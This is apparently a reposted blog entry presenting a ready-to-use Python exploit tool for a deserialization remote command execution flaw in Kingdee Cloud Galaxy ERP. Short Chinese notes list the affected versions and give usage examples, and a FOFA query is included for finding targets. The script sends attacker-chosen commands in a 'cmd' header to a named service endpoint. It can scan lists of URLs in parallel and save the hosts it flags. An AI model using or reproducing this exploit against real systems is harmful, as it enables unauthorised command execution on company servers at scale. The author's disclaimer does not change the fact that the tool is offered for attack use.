金蝶云星空 Kingdee-erp-Unserialize-RCE
由于金蝶云星空数据通信默认采用的是二进制数据格式，需要进行序列化与反序列化，在此过程中未对数据进行签名或校验，导致客户端发出的数据可被攻击者恶意篡改，写入包含恶意代码的序列化数据，达到在服务端远程命令执行的效果。该漏洞不仅存在于金蝶云星空管理中心（默认8000端口），普通应用（默认80端口）也存在类似问题。
影响范围:
6.x版本:低于6.2.1012.4
7.x版本:7.0.352.16 至 7.7.0.202111
8.x版本:8.0.0.202205 至 8.1.0.20221110
Usage
usage: Kingdee-erp-Unserialize-RCE.py [-h] [-u URL] [--check] [-f FILE] [-t THREAD] [-T TIMEOUT] [-o OUTPUT]
[-p PROXY] [--cmd CMD]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Target url(e.g. http://127.0.0.1)
--check Check if vulnerable
-f FILE, --file FILE Target file(e.g. url.txt)
-t THREAD, --thread THREAD
Number of thread (default 5)
-T TIMEOUT, --timeout TIMEOUT
Request timeout (default 3)
-o OUTPUT, --output OUTPUT
Vuln url output file (e.g. result.txt)
-p PROXY, --proxy PROXY
Request Proxy (e.g http://127.0.0.1:8080)
--cmd CMD execute cmd (e.g. whoami)
poc
python .\Kingdee-erp-Unserialize-RCE.py -f .\url.txt --check -t 10
exp
python .\Kingdee-erp-Unserialize-RCE.py -u http://host --cmd 'dir'
免责声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#fofa: app="金蝶云星空-管理中心"
import os
import time
from urllib import response
from urllib.parse import urljoin
from weakref import proxy
import requests
from threading import Lock
from concurrent.futures import ThreadPoolExecutor
from argparse import ArgumentParser
# Silence urllib3 warnings for the whole process; the requests sent by this
# script pass verify=False, which would otherwise emit a warning per request.
requests.packages.urllib3.disable_warnings()
class POC:
    """Command-line checker driven entirely from ``__init__``.

    Two modes are selected from the parsed arguments:

    * ``-u URL``: send one request and print the verdict (``verfyurl``).
    * ``-f FILE``: check every URL in the file on a thread pool
      (``multiRun``/``verify``), then print a summary and append the
      flagged URLs to ``./output/<output>.txt``.

    When both ``-u`` and ``-f`` are given, only ``-u`` is handled.
    """

    # Sentinel returned by respose() when the HTTP request could not be made.
    # Callers compare against it with ``==``; a substring test would also
    # match ordinary response bodies that merely contain "conn".
    CONN_FAILED = "conn"

    # Text searched for in the response body during batch checks.
    VULN_MARKER = "authority\\system"

    def __init__(self):
        """Print the banner, parse the CLI arguments and run the chosen mode."""
        self.banner()
        self.args = self.parseArgs()
        if self.args.url:
            if self.args.check or self.args.cmd:
                self.verfyurl()
        elif self.args.file:
            self.init()
            self.urlList = self.loadURL()
            # Start the clock before the run so "Time Spent" covers the scan.
            self.start = time.time()
            self.multiRun()
            # Report explicitly instead of relying on __del__, whose timing
            # depends on when the instance happens to be garbage-collected.
            self._report()

    def banner(self):
        """Print the ASCII-art logo in red."""
        logo = r"""
_ ___ _ _____ _____ ______
| |/ (_) | | | __ \ / ____| ____|
| ' / _ _ __ __ _ __| | ___ ___ ______| |__) | | | |__
| < | | '_ \ / _` |/ _` |/ _ \/ _ \______| _ /| | | __|
| . \| | | | | (_| | (_| | __/ __/ | | \ \| |____| |____
|_|\_\_|_| |_|\__, |\__,_|\___|\___| |_| \_\\_____|______|
__/ |
|___/
author: Sweelg
GitHub: https://github.com/Sweelg
"""
        print("\033[91m" + logo + "\033[0m")

    def parseArgs(self):
        """Build the argument parser and return the parsed namespace.

        The default for ``--output`` is a timestamp taken when this method
        runs, formatted as ``YYYY-mm-dd_HH-MM-SS``.
        """
        date = time.strftime("%Y-%m-%d_%H-%M-%S", time.localtime())
        parser = ArgumentParser()
        parser.add_argument("-u", "--url", required=False, type=str, help="Target url(e.g. http://127.0.0.1)")
        parser.add_argument("--check", default=False, action='store_true', help="Check if vulnerable")
        parser.add_argument("-f", "--file", required=False, type=str, help="Target file(e.g. url.txt)")
        parser.add_argument("-t", "--thread", required=False, type=int, default=5, help="Number of thread (default 5)")
        parser.add_argument("-T", "--timeout", required=False, type=int, default=3, help="Request timeout (default 3)")
        parser.add_argument("-o", "--output", required=False, type=str, default=date, help="Vuln url output file (e.g. result.txt)")
        parser.add_argument("-p", "--proxy", default=None, help="Request Proxy (e.g http://127.0.0.1:8080)")
        parser.add_argument("--cmd", required=False, type=str, default='whoami', help="execute cmd (e.g. whoami)")
        return parser.parse_args()

    def init(self):
        """Print the run settings and make sure the URL file exists.

        Raises:
            SystemExit: with status 1 when ``args.file`` is not a regular file.
        """
        print("\nthread:", self.args.thread)
        print("timeout:", self.args.timeout)
        if not os.path.isfile(self.args.file):
            print(f"\033[31mLoad url file {self.args.file} failed\033[0m\n")
            print("Init failed, Please check the environment.")
            # Non-zero status: this is a failure, and SystemExit (unlike
            # os._exit) lets the interpreter shut down normally.
            raise SystemExit(1)
        print("Load url file successfully\n")
        print("Init successfully")

    def respose(self, url):
        """POST the request to ``url`` and return the response body as text.

        Args:
            url: Base URL of the target; the service path is joined onto it.

        Returns:
            The response text, or ``CONN_FAILED`` when the request could not
            be completed.
        """
        proxy_url = self.args.proxy
        proxies = {"http": proxy_url, "https": proxy_url} if proxy_url else None
        path = "/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc"
        target = urljoin(url, path)
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
            "Content-Type": "text/json",
            "cmd": self.args.cmd,
        }
        data = '{\n"ap0": "",\n"format": "3"\n}'
        try:
            reply = requests.post(
                target,
                headers=headers,
                data=data,
                proxies=proxies,
                timeout=self.args.timeout,
                verify=False,
            )
        except (requests.RequestException, ValueError):
            # RequestException covers connection, timeout and invalid-URL
            # errors; ValueError is kept as a net for malformed URL/header
            # values rejected before anything is sent.
            return self.CONN_FAILED
        return reply.text

    def verfyurl(self):
        """Check the single URL in ``args.url`` and print the verdict."""
        url = self.args.url
        repData = self.respose(url)
        # Test the failure sentinel first: it is a non-empty string and would
        # otherwise be reported as a positive result below.
        if repData == self.CONN_FAILED:
            print("[-] URL连接失败! [-] url: {}".format(url))
            return
        res = repData.split("response_error:")[0].strip()
        if res:
            print("[+] 漏洞存在!!![✅] url: {}\n{}".format(url, res))
        else:
            print("[x] 未检测到漏洞![x] url: {}".format(url))

    def verify(self, url):
        """Check one URL from the batch and record it when flagged.

        Runs on worker threads; ``multiRun`` must have created ``self.lock``,
        ``self.findCount`` and ``self.vulnRULList`` beforehand.
        """
        repData = self.respose(url)
        if repData == self.CONN_FAILED:
            msg = "[-] URL连接失败! [-] url: {}".format(url)
        elif self.VULN_MARKER in repData:
            msg = "[+] 漏洞存在!!![✅] url: {}".format(url)
            with self.lock:
                self.findCount += 1
                self.vulnRULList.append(url)
        else:
            msg = "[x] 未检测到漏洞![x] url: {}".format(url)
        # Print under the lock so lines from different workers do not mix.
        with self.lock:
            print(msg)

    def loadURL(self):
        """Return the non-blank, stripped lines of ``args.file`` as a list."""
        with open(self.args.file, encoding="utf8") as f:
            stripped = (line.strip() for line in f)
            # Blank lines are not targets; keeping them would send requests
            # to an empty URL and inflate the total count.
            return [u for u in stripped if u]

    def multiRun(self):
        """Run ``verify`` over ``self.urlList`` on a thread pool and wait.

        Resets ``findCount``/``vulnRULList`` and creates the shared lock.
        """
        self.findCount = 0
        self.vulnRULList = []
        self.lock = Lock()
        # Leaving the ``with`` block waits for every submitted task, so the
        # counters are final by the time this method returns.
        with ThreadPoolExecutor(max_workers=self.args.thread) as executor:
            executor.map(self.verify, self.urlList)

    def output(self):
        """Append the flagged URLs to ``./output/<args.output>.txt``.

        The path is stored in ``self.outputFile``.
        """
        os.makedirs(r"./output", exist_ok=True)
        self.outputFile = f"./output/{self.args.output}.txt"
        # Same encoding as loadURL so non-ASCII URLs round-trip.
        with open(self.outputFile, "a", encoding="utf8") as f:
            f.writelines(url + "\n" for url in self.vulnRULList)

    def _report(self):
        """Print the batch summary and elapsed time, then save the results."""
        print("\nAlltCount:\033[31m%d\033[0m\nVulnCount:\033[32m%d\033[0m" % (len(self.urlList), self.findCount))
        self.end = time.time()
        print("Time Spent: %.2f" % (self.end - self.start))
        self.output()
        print("-" * 20, f"\nThe vulnURL has been saved in {self.outputFile}\n")
if __name__ == "__main__":
    # Script entry point: constructing POC parses the command line and runs
    # the selected mode from its constructor.
    POC()
本文链接:https://www.kinber.cn/post/4713.html 转载需授权!
推荐本站淘宝优惠价购买喜欢的宝贝: